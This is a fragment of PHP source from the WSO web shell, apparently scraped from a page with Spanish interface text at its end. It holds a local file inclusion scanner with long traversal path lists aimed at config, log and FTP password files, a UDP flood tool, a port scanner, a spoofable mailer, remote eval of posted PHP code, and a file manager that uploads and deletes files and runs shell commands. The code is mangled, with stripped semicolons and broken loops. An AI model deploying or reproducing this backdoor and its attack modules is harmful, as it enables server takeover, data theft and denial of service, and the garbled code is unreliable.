17 =>\\\"../../../../../../../../../../../../../../../etc/php/php.ini\\\".$byte1.\\\"\\\",
18 =>\\\"../../../../../../../../../../../../../../../etc/php/php4/php.ini\\\".$byte1.\\\"\\\",
19 =>\\\"../../../../../../../../../../../../../../../etc/php/apache/php.ini\\\".$byte1.\\\"\\\",
20 =>\\\"../../../../../../../../../../../../../../../etc/php/apache2/php.ini\\\".$byte1.\\\"\\\",
21 =>\\\"../../../../../../../../../../../../../../../web/conf/php.ini\\\".$byte1.\\\"\\\",
22 =>\\\"../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini\\\".$byte1.\\\"\\\",
23 =>\\\"../../../../../../../../../../../../../../../opt/xampp/etc/php.ini\\\".$byte1.\\\"\\\",
24 =>\\\"../../../../../../../../../../../../../../../var/local/www/conf/php.ini\\\".$byte1.\\\"\\\",
25 =>\\\"../../../../../../../../../../../../../../../etc/php/cgi/php.ini\\\".$byte1.\\\"\\\",
26 =>\\\"../../../../../../../../../../../../../../../etc/php4/cgi/php.ini\\\".$byte1.\\\"\\\",
27 =>\\\"../../../../../../../../../../../../../../../etc/php5/cgi/php.ini\\\".$byte1.\\\"\\\")
$lfimysql = array(
1 =>\\\"../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log\\\".$byte1.\\\"\\\",
2 =>\\\"../../../../../../../../../../../../../../../var/log/mysql.log\\\".$byte1.\\\"\\\",
3 =>\\\"../../../../../../../../../../../../../../../var/log/mysqlderror.log\\\".$byte1.\\\"\\\",
4 =>\\\"../../../../../../../../../../../../../../../var/log/mysql/mysql.log\\\".$byte1.\\\"\\\",
5 =>\\\"../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log\\\".$byte1.\\\"\\\",
6 =>\\\"../../../../../../../../../../../../../../../var/mysql.log\\\".$byte1.\\\"\\\",
7 =>\\\"../../../../../../../../../../../../../../../var/lib/mysql/my.cnf\\\".$byte1.\\\"\\\",
8 =>\\\"../../../../../../../../../../../../../../../etc/mysql/my.cnf\\\".$byte1.\\\"\\\",
9 =>\\\"../../../../../../../../../../../../../../../var/log/mysqld.log\\\".$byte1.\\\"\\\",
10 =>\\\"../../../../../../../../../../../../../../../etc/my.cnf\\\".$byte1.\\\"\\\")
$lfiftp = array(
1 =>\\\"../../../../../../../../../../../../../../../etc/logrotate.d/proftpd\\\".$byte1.\\\"\\\",
2 =>\\\"../../../../../../../../../../../../../../../www/logs/proftpd.system.log\\\".$byte1.\\\"\\\",
3 =>\\\"../../../../../../../../../../../../../../../var/log/proftpd\\\".$byte1.\\\"\\\",
4 =>\\\"../../../../../../../../../../../../../../../etc/proftp.conf\\\".$byte1.\\\"\\\",
5 =>\\\"../../../../../../../../../../../../../../../etc/protpd/proftpd.conf\\\".$byte1.\\\"\\\",
6 =>\\\"../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf\\\".$byte1.\\\"\\\",
7 =>\\\"../../../../../../../../../../../../../../../etc/proftpd/modules.conf\\\".$byte1.\\\"\\\",
8 =>\\\"../../../../../../../../../../../../../../../var/log/vsftpd.log\\\".$byte1.\\\"\\\",
9 =>\\\"../../../../../../../../../../../../../../../etc/vsftpd.chroot_list\\\".$byte1.\\\"\\\",
10 =>\\\"../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log\\\".$byte1.\\\"\\\",
11 =>\\\"../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf\\\".$byte1.\\\"\\\",
12 =>\\\"../../../../../../../../../../../../../../../etc/vsftpd.conf\\\".$byte1.\\\"\\\",
13 =>\\\"../../../../../../../../../../../../../../../etc/chrootUsers\\\".$byte1.\\\"\\\",
14 =>\\\"../../../../../../../../../../../../../../../var/log/xferlog\\\".$byte1.\\\"\\\",
15 =>\\\"../../../../../../../../../../../../../../../var/adm/log/xferlog\\\".$byte1.\\\"\\\",
16 =>\\\"../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess\\\".$byte1.\\\"\\\",
17 =>\\\"../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts\\\".$byte1.\\\"\\\",
18 =>\\\"../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers\\\".$byte1.\\\"\\\",
19 =>\\\"../../../../../../../../../../../../../../../usr/sbin/pure-config.pl\\\".$byte1.\\\"\\\",
20 =>\\\"../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf\\\".$byte1.\\\"\\\",
21 =>\\\"../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf\\\".$byte1.\\\"\\\",
22 =>\\\"../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf\\\".$byte1.\\\"\\\",
23 =>\\\"../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb\\\".$byte1.\\\"\\\",
24 =>\\\"../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb\\\".$byte1.\\\"\\\",
25 =>\\\"../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl\\\".$byte1.\\\"\\\",
26 =>\\\"../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf\\\".$byte1.\\\"\\\",
27 =>\\\"../../../../../../../../../../../../../../../etc/pure-ftpd.conf\\\".$byte1.\\\"\\\",
28 =>\\\"../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb\\\".$byte1.\\\"\\\",
29 =>\\\"../../../../../../../../../../../../../../../etc/pureftpd.pdb\\\".$byte1.\\\"\\\",
30 =>\\\"../../../../../../../../../../../../../../../etc/pureftpd.passwd\\\".$byte1.\\\"\\\",
31 =>\\\"../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb\\\".$byte1.\\\"\\\",
32 =>\\\"../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/\\\".$byte1.\\\"\\\",
33 =>\\\"../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/\\\".$byte1.\\\"\\\",
34 =>\\\"../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/\\\".$byte1.\\\"\\\",
35 =>\\\"../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/\\\".$byte1.\\\"\\\",
36 =>\\\"../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log\\\".$byte1.\\\"\\\",
37 =>\\\"../../../../../../../../../../../../../../../logs/pure-ftpd.log\\\".$byte1.\\\"\\\",
38 =>\\\"../../../../../../../../../../../../../../../var/log/pureftpd.log\\\".$byte1.\\\"\\\",
39 =>\\\"../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log\\\".$byte1.\\\"\\\",
40 =>\\\"../../../../../../../../../../../../../../../var/log/ftp-proxy\\\".$byte1.\\\"\\\",
41 =>\\\"../../../../../../../../../../../../../../../var/log/ftplog\\\".$byte1.\\\"\\\",
42 =>\\\"../../../../../../../../../../../../../../../etc/logrotate.d/ftp\\\".$byte1.\\\"\\\",
43 =>\\\"../../../../../../../../../../../../../../../etc/ftpchroot\\\".$byte1.\\\"\\\",
44 =>\\\"../../../../../../../../../../../../../../../etc/ftphosts\\\".$byte1.\\\"\\\")
$x = 1
if ( $type == 1 ) {
$res1 = FetchURL($target.$lfitest)
$res2 = FetchURL($target.$lfitest2)
$rhash1 = md5($res1)
$rhash2 = md5($res2)
if ($rhash1 != $rhash2) {
print \\\"
[+] Exploitable!
 \\\".$target.\\\"\\\".$lfitest.\\\"
\\\"
while($lfiaccess[$x]) {
$res3 = FetchURL($target.$lfiaccess[$x])
$rhash3 = md5($res3)
if ($rhash3 != $rhash2) {
print \\\"
[+] File detected!
 \\\".$target.\\\"\\\".$lfiaccess[$x].\\\"
\\\"
}
else {
print \\\"
[!] Failed!
\\\".$target.\\\"\\\".$lfiaccess[$x].\\\"
\\\"
}
$x++
}
}
}
if ( $type == 2 ) {
$res1 = FetchURL($target.$lfitest)
$res2 = FetchURL($target.$lfitest2)
$rhash1 = md5($res1)
$rhash2 = md5($res2)
if ($rhash1 != $rhash2) {
print \\\"
[+] Exploitable!
 \\\".$target.\\\"\\\".$lfitest.\\\"
\\\"
while($lficonfig[$x]) {
$res3 = FetchURL($target.$lficonfig[$x])
$rhash3 = md5($res3)
if ($rhash3 != $rhash2) {
print \\\"
[+] File detected!
 \\\".$target.\\\"\\\".$lficonfig[$x].\\\"
\\\"
}
else {
print \\\"
[!] Failed!
\\\".$target.\\\"\\\".$lficonfig[$x].\\\"
\\\"
}
$x++
}
}
}
if ( $type == 3 ) {
$res1 = FetchURL($target.$lfitest)
$res2 = FetchURL($target.$lfitest2)
$rhash1 = md5($res1)
$rhash2 = md5($res2)
if ($rhash1 != $rhash2) {
print \\\"
[+] Exploitable!
 \\\".$target.\\\"\\\".$lfitest.\\\"
\\\"
while($lfierror[$x]) {
$res3 = FetchURL($target.$lfierror[$x])
$rhash3 = md5($res3)
if ($rhash3 != $rhash2) {
print \\\"
[+] File detected!
 \\\".$target.\\\"\\\".$lfierror[$x].\\\"
\\\"
}
else {
print \\\"
[!] Failed!
\\\".$target.\\\"\\\".$lfierror[$x].\\\"
\\\"
}
$x++
}
}
}
if ( $type == 4 ) {
$res1 = FetchURL($target.$lfitest)
$res2 = FetchURL($target.$lfitest2)
$rhash1 = md5($res1)
$rhash2 = md5($res2)
if ($rhash1 != $rhash2) {
print \\\"
[+] Exploitable!
 \\\".$target.\\\"\\\".$lfitest.\\\"
\\\"
while($lfiphpini[$x]) {
$res3 = FetchURL($target.$lfiphpini[$x])
$rhash3 = md5($res3)
if ($rhash3 != $rhash2) {
print \\\"
[+] File detected!
 \\\".$target.\\\"\\\".$lfiphpini[$x].\\\"
\\\"
}
else {
print \\\"
[!] Failed!
\\\".$target.\\\"\\\".$lfiphpini[$x].\\\"
\\\"
}
$x++
}
}
}
if ( $type == 5 ) {
$res1 = FetchURL($target.$lfitest)
$res2 = FetchURL($target.$lfitest2)
$rhash1 = md5($res1)
$rhash2 = md5($res2)
if ($rhash1 != $rhash2) {
print \\\"
[+] Exploitable!
 \\\".$target.\\\"\\\".$lfitest.\\\"
\\\"
while($lfimysql[$x]) {
$res3 = FetchURL($target.$lfimysql[$x])
$rhash3 = md5($res3)
if ($rhash3 != $rhash2) {
print \\\"
[+] File detected!
 \\\".$target.\\\"\\\".$lfimysql[$x].\\\"
\\\"
}
else {
print \\\"
[!] Failed!
\\\".$target.\\\"\\\".$lfimysql[$x].\\\"
\\\"
}
$x++
}
}
}
if ( $type == 6 ) {
$res1 = FetchURL($target.$lfitest)
$res2 = FetchURL($target.$lfitest2)
$rhash1 = md5($res1)
$rhash2 = md5($res2)
if ($rhash1 != $rhash2) {
print \\\"
[+] Exploitable!
 \\\".$target.\\\"\\\".$lfitest.\\\"
\\\"
while($lfiftp[$x]) {
$res3 = FetchURL($target.$lfiftp[$x])
$rhash3 = md5($res3)
if ($rhash3 != $rhash2) {
print \\\"
[+] File detected!
 \\\".$target.\\\"\\\".$lfiftp[$x].\\\"
\\\"
}
else {
print \\\"
[!] Failed!
\\\".$target.\\\"\\\".$lfiftp[$x].\\\"
\\\"
}
$x++
}
}
}
if ( $type == 7 ) {
$res1 = FetchURL($target.$lfitest)
$res2 = FetchURL($target.$lfitest2)
$rhash1 = md5($res1)
$rhash2 = md5($res2)
if ($rhash1 != $rhash2) {
print \\\"
[+] Exploitable!
 \\\".$target.\\\"\\\".$lfitest.\\\"
\\\"{
$res3 = FetchURL($target.$lfiprocenv)
$rhash3 = md5($res3)
if ($rhash3 != $rhash2) {
print \\\"
[+] File detected!
 \\\".$target.\\\"\\\".$lfiprocenv.\\\"
\\\"
}
else {
print \\\"
[!] Failed!
\\\".$target.\\\"\\\".$lfiprocenv.\\\"
\\\"
}
}
}
}
}
wsoFooter()
}
function actionphptools() {
wsoHeader()
echo \\\'
\\\'
echo \\\'Mailer











\\\'
if (isset($_POST[\\\'to\\\']) &&isset($_POST[\\\'from\\\']) &&isset($_POST[\\\'subject\\\']) &&isset($_POST[\\\'body\\\'])) {
$headers = \\\'From: \\\'.$_POST[\\\'from\\\']
mail ($_POST[\\\'to\\\'],$_POST[\\\'subject\\\'],$_POST[\\\'body\\\'],$headers)
echo \\\'Email sent.\\\'
}
echo \\\'
Port Scanner
\\\'
$start = strip_tags($_POST[\\\'start\\\'])
$end = strip_tags($_POST[\\\'end\\\'])
$host = strip_tags($_POST[\\\'host\\\'])
if(isset($_POST[\\\'host\\\']) &&is_numeric($_POST[\\\'end\\\']) &&is_numeric($_POST[\\\'start\\\'])){
for($i = $start$i$fp = @fsockopen($host,$i,$errno,$errstr,3)
if($fp){
echo \\\'Port \\\'.$i.\\\' is open
\\\'
}
flush()
}
}else{
echo \\\'


Host:



Port start:



Port end:




\\\'
}
if(isset($_POST[\\\'host\\\'])&&is_numeric($_POST[\\\'time\\\'])){
$pakits = 0
ignore_user_abort(TRUE)
set_time_limit(0)
$exec_time = $_POST[\\\'time\\\']
$time = time()
$max_time = $time+$exec_time
$host = $_POST[\\\'host\\\']
for($i=0$i$out .= \\\'X\\\'
}
while(1){
$pakits++
if(time() >$max_time){
break
}
$rand = rand(1,65000)
$fp = fsockopen(\\\'udp://\\\'.$host,$rand,$errno,$errstr,5)
if($fp){
fwrite($fp,$out)
fclose($fp)
}
}
echo \\\"
UDP Flood
Completed with $pakits (\\\".round(($pakits*65)/1024,2) .\\\" MB) packets averaging \\\".round($pakits/$exec_time,2) .\\\" packets per second \\\\n\\\"
echo \\\'




Host:
Length (seconds):
\\\'
}else{echo \\\'
UDP Flood



Host:


Length (seconds):


\\\'
}
echo \\\'
\\\'
wsoFooter()}
function actionPhp() {
if(isset($_POST[\\\'ajax\\\'])) {
$_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']) .\\\'ajax\\\'] = true
ob_start()
eval($_POST[\\\'p1\\\'])
$temp = \\\"document.getElementById(\\\'PhpOutput\\\').style.display=\\\'\\\'document.getElementById(\\\'PhpOutput\\\').innerHTML=\\\'\\\".addcslashes(htmlspecialchars(ob_get_clean()),\\\"\\\\n\\\\r\\\\t\\\\\\\\\\\'\\\\0\\\") .\\\"\\\'\\\\n\\\"
echo strlen($temp),\\\"\\\\n\\\",$temp
exit
}
wsoHeader()
if(isset($_POST[\\\'p2\\\']) &&($_POST[\\\'p2\\\'] == \\\'info\\\')) {
echo \\\'

PHP info

\\\'
ob_start()
phpinfo()
$tmp = ob_get_clean()
$tmp = preg_replace(\\\'!(body|a:\\\\w+|body, td, th, h1, h2) {.*}!msiU\\\',\\\'\\\',$tmp)
$tmp = preg_replace(\\\'!td, th {(.*)}!msiU\\\',\\\'.e, .v, .h, .h th {$1}\\\',$tmp)
echo str_replace(\\\'
\\\'
}
if(empty($_POST[\\\'ajax\\\']) &&!empty($_POST[\\\'p1\\\']))
$_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']) .\\\'ajax\\\'] = false
echo \\\'

Execution PHP-code

\\\'
echo \\\' send using AJAX
\\\'
if(!empty($_POST[\\\'p1\\\'])) {
ob_start()
eval($_POST[\\\'p1\\\'])
echo htmlspecialchars(ob_get_clean())
}
echo \\\'
\\\'
wsoFooter()
}
function actionFilesMan() {
wsoHeader()
echo \\\'

File manager

\\\'
if(!empty($_POST[\\\'p1\\\'])) {
switch($_POST[\\\'p1\\\']) {
case \\\'uploadFile\\\':
if(!@move_uploaded_file($_FILES[\\\'f\\\'][\\\'tmp_name\\\'],$_FILES[\\\'f\\\'][\\\'name\\\']))
echo \\\"Can\\\'t upload file!\\\"
break
case \\\'mkdir\\\':
if(!@mkdir($_POST[\\\'p2\\\']))
echo \\\"Can\\\'t create new dir\\\"
break
case \\\'delete\\\':
function deleteDir($path) {
$path = (substr($path,-1)==\\\'/\\\') ?$path:$path.\\\'/\\\'
$dh = opendir($path)
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item
if ( (basename($item) == \\\"..\\\") ||(basename($item) == \\\".\\\") )
continue
$type = filetype($item)
if ($type == \\\"dir\\\")
deleteDir($item)
else
@unlink($item)
}
closedir($dh)
@rmdir($path)
}
if(is_array(@$_POST[\\\'f\\\']))
foreach($_POST[\\\'f\\\'] as $f) {
if($f == \\\'..\\\')
continue
$f = urldecode($f)
if(is_dir($f))
deleteDir($f)
else
@unlink($f)
}
break
case \\\'paste\\\':
if($_SESSION[\\\'act\\\'] == \\\'copy\\\') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s)
$h = @opendir($c.$s)
while (($f = @readdir($h)) !== false)
if (($f != \\\".\\\") and ($f != \\\"..\\\"))
copy_paste($c.$s.\\\'/\\\',$f,$d.$s.\\\'/\\\')
}elseif(is_file($c.$s))
@copy($c.$s,$d.$s)
}
foreach($_SESSION[\\\'f\\\'] as $f)
copy_paste($_SESSION[\\\'c\\\'],$f,$GLOBALS[\\\'cwd\\\'])
}elseif($_SESSION[\\\'act\\\'] == \\\'move\\\') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s)
$h = @opendir($c.$s)
while (($f = @readdir($h)) !== false)
if (($f != \\\".\\\") and ($f != \\\"..\\\"))
copy_paste($c.$s.\\\'/\\\',$f,$d.$s.\\\'/\\\')
}elseif(@is_file($c.$s))
@copy($c.$s,$d.$s)
}
foreach($_SESSION[\\\'f\\\'] as $f)
@rename($_SESSION[\\\'c\\\'].$f,$GLOBALS[\\\'cwd\\\'].$f)
}elseif($_SESSION[\\\'act\\\'] == \\\'zip\\\') {
if(class_exists(\\\'ZipArchive\\\')) {
$zip = new ZipArchive()
if ($zip->open($_POST[\\\'p2\\\'],1)) {
chdir($_SESSION[\\\'c\\\'])
foreach($_SESSION[\\\'f\\\'] as $f) {
if($f == \\\'..\\\')
continue
if(@is_file($_SESSION[\\\'c\\\'].$f))
$zip->addFile($_SESSION[\\\'c\\\'].$f,$f)
elseif(@is_dir($_SESSION[\\\'c\\\'].$f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\\\'/\\\'))
foreach ($iterator as $key=>$value) {
$zip->addFile(realpath($key),$key)
}
}
}
chdir($GLOBALS[\\\'cwd\\\'])
$zip->close()
}
}
}elseif($_SESSION[\\\'act\\\'] == \\\'unzip\\\') {
if(class_exists(\\\'ZipArchive\\\')) {
$zip = new ZipArchive()
foreach($_SESSION[\\\'f\\\'] as $f) {
if($zip->open($_SESSION[\\\'c\\\'].$f)) {
$zip->extractTo($GLOBALS[\\\'cwd\\\'])
$zip->close()
}
}
}
}elseif($_SESSION[\\\'act\\\'] == \\\'tar\\\') {
chdir($_SESSION[\\\'c\\\'])
$_SESSION[\\\'f\\\'] = array_map(\\\'escapeshellarg\\\',$_SESSION[\\\'f\\\'])
wsoEx(\\\'tar cfzv \\\'.escapeshellarg($_POST[\\\'p2\\\']) .\\\' \\\'.implode(\\\' \\\',$_SESSION[\\\'f\\\']))
chdir($GLOBALS[\\\'cwd\\\'])
}
unset($_SESSION[\\\'f\\\'])
break
default:
if(!empty($_POST[\\\'p1\\\'])) {
$_SESSION[\\\'act\\\'] = @$_POST[\\\'p1\\\']
$_SESSION[\\\'f\\\'] = @$_POST[\\\'f\\\']
foreach($_SESSION[\\\'f\\\'] as $k =>$f)
$_SESSION[\\\'f\\\'][$k] = urldecode($f)
$_SESSION[\\\'c\\\'] = @$_POST[\\\'c\\\']
}
break
}
}
$dirContent = @scandir(isset($_POST[\\\'c\\\'])?$_POST[\\\'c\\\']:$GLOBALS[\\\'cwd\\\'])
if($dirContent === false) {echo \\\'Can\\\\\\\'t open this folder!\\\'wsoFooter()return}
global $sort
$sort = array(\\\'name\\\',1)
if(!empty($_POST[\\\'p1\\\'])) {
if(preg_match(\\\'!s_([A-z]+)_(\\\\d{1})!\\\',$_POST[\\\'p1\\\'],$match))
$sort = array($match[1],(int)$match[2])
}
echo \\\"
\\\"
$dirs = $files = array()
$n = count($dirContent)
for($i=0$i$ow = @posix_getpwuid(@fileowner($dirContent[$i]))
$gr = @posix_getgrgid(@filegroup($dirContent[$i]))
$tmp = array(\\\'name\\\'=>$dirContent[$i],
\\\'path\\\'=>$GLOBALS[\\\'cwd\\\'].$dirContent[$i],
\\\'modify\\\'=>date(\\\'Y-m-d H:i:s\\\',@filemtime($GLOBALS[\\\'cwd\\\'] .$dirContent[$i])),
\\\'perms\\\'=>wsoPermsColor($GLOBALS[\\\'cwd\\\'] .$dirContent[$i]),
\\\'size\\\'=>@filesize($GLOBALS[\\\'cwd\\\'].$dirContent[$i]),
\\\'owner\\\'=>$ow[\\\'name\\\']?$ow[\\\'name\\\']:@fileowner($dirContent[$i]),
\\\'group\\\'=>$gr[\\\'name\\\']?$gr[\\\'name\\\']:@filegroup($dirContent[$i])
)
if(@is_file($GLOBALS[\\\'cwd\\\'] .$dirContent[$i]))
$files[] = array_merge($tmp,array(\\\'type\\\'=>\\\'file\\\'))
elseif(@is_link($GLOBALS[\\\'cwd\\\'] .$dirContent[$i]))
$dirs[] = array_merge($tmp,array(\\\'type\\\'=>\\\'link\\\',\\\'link\\\'=>readlink($tmp[\\\'path\\\'])))
elseif(@is_dir($GLOBALS[\\\'cwd\\\'] .$dirContent[$i])&&($dirContent[$i] != \\\".\\\"))
$dirs[] = array_merge($tmp,array(\\\'type\\\'=>\\\'dir\\\'))
}
$GLOBALS[\\\'sort\\\'] = $sort
function wsoCmp($a,$b) {
if($GLOBALS[\\\'sort\\\'][0] != \\\'size\\\')
return strcmp(strtolower($a[$GLOBALS[\\\'sort\\\'][0]]),strtolower($b[$GLOBALS[\\\'sort\\\'][0]]))*($GLOBALS[\\\'sort\\\'][1]?1:-1)
else
return (($a[\\\'size\\\'] }
usort($files,\\\"wsoCmp\\\")
usort($dirs,\\\"wsoCmp\\\")
$files = array_merge($dirs,$files)
$l = 0
foreach($files as $f) {
echo \\\'\\\'.htmlspecialchars($f[\\\'name\\\']):\\\'g(\\\\\\\'FilesMan\\\\\\\',\\\\\\\'\\\'.$f[\\\'path\\\'].\\\'\\\\\\\')\\\" title=\\\'.$f[\\\'link\\\'] .\\\'>[ \\\'.htmlspecialchars($f[\\\'name\\\']) .\\\' ]\\\').\\\'\\\'.(($f[\\\'type\\\']==\\\'file\\\')?wsoViewSize($f[\\\'size\\\']):$f[\\\'type\\\']).\\\'\\\'.$f[\\\'modify\\\'].\\\'\\\'.$f[\\\'owner\\\'].\\\'/\\\'.$f[\\\'group\\\'].\\\'\\\'.$f[\\\'perms\\\']
.\\\'
RT\\\'.(($f[\\\'type\\\']==\\\'file\\\')?\\\' ED\\\':\\\'\\\').\\\'\\\'
$l = $l?0:1
}
echo \\\"
NameSizeModifyOwner/GroupPermissionsActions  










&nbsp\\\"
if(!empty($_SESSION[\\\'act\\\']) &&@count($_SESSION[\\\'f\\\']) &&(($_SESSION[\\\'act\\\'] == \\\'zip\\\') ||($_SESSION[\\\'act\\\'] == \\\'tar\\\')))
echo \\\"file name: &nbsp\\\"
echo \\\"\\\"
wsoFooter()
}
function actionStringTools() {
if(!function_exists(\\\'hex2bin\\\')) {function hex2bin($p) {return decbin(hexdec($p))}}
if(!function_exists(\\\'binhex\\\')) {function binhex($p) {return dechex(bindec($p))}}
if(!function_exists(\\\'hex2ascii\\\')) {function hex2ascii($p){$r=\\\'\\\'for($i=0$iif(!function_exists(\\\'ascii2hex\\\')) {function ascii2hex($p){$r=\\\'\\\'for($i=0$iif(!function_exists(\\\'full_urlencode\\\')) {function full_urlencode($p){$r=\\\'\\\'for($i=0$i$stringTools = array(
\\\'Base64 encode\\\'=>\\\'base64_encode\\\',
\\\'Base64 decode\\\'=>\\\'base64_decode\\\',
\\\'Url encode\\\'=>\\\'urlencode\\\',
\\\'Url decode\\\'=>\\\'urldecode\\\',
\\\'Full urlencode\\\'=>\\\'full_urlencode\\\',
\\\'md5 hash\\\'=>\\\'md5\\\',
\\\'sha1 hash\\\'=>\\\'sha1\\\',
\\\'crypt\\\'=>\\\'crypt\\\',
\\\'CRC32

Seleccionar color:
< Volver